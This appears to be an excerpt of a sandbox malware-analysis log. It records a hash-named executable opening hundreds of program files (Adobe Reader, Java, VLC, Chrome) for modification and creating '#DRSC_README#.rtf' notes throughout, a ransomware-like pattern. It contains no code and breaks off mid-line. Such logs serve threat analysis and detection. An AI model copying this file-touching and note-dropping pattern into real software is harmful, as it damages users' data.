opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\root\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\DVA.api 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ja-jp\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\en-gb\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\de-de\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\themes\dark\adobe_spinner.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_gtk.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\deploy\messages_sv.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\share_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.intro.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\common.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_auditreport_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ko-kr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_sv_135x40.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\am_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themes\dark\close.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\README.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\example_icons2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\selector.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\license.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-api-annotations-common_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\it-it\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\it-it\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\AddEnter.fon 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ko-kr\AppStore_icon.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-keyring-fallback.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress-indeterminate.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\hu-hu\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\bg_pattern_RHP.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\lt.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ko-kr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\epl-v10.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\th_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-progress-ui_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\status.json 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\fi-fi\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\es-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\sl-si\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\compare-2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\jjs.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\illustrations_retina.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\sv-se\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\ECLIPSE_.SF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\dumpmeta.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\js\plugin.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\example_icons2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\fr-fr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\s_listview_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\en-gb\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\META-INF\MANIFEST.MF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\epdf\plugin.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\root\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\rt.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.update.configurator.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\css\main-selector.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\forms_poster.jpg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Windows Mail\en-US\WinMail.exe.mui 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\fillandsign.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sk-sk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\faf_icons_retina.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_tr_135x40.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.syntheticattribute.exsd 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\java.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-selector-api.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\fonts\TwemojiMozilla.ttf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ar-ae\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\rhp_world_icon.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\find-text.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\jabswitch.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\javax.annotation_1.2.0.v201401042248.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\adc_logo.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\SearchEmail.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\COPYRIGHT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_fillandsign_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\convertpdf-selector.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\tr-tr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\zh-cn\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-openide-windows.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.help.base_4.0.200.v20141007-2301.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\stop_collection_data.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\en-gb\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\pt-br\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\illustrations_retina.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\theme-2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\chrome_pwa_launcher.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_da_135x40.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\sk-sk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.reconciler.dropins_1.1.200.v20131119-0908.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.services.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\ext\locale\updater_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ro-ro\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\fr_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\en-gb\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\tnameserv.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Edit_R_Exp_RHP.aapp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\it-it\PlayStore_icon.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\af_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_nl_135x40.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\sv-se\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\java.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader 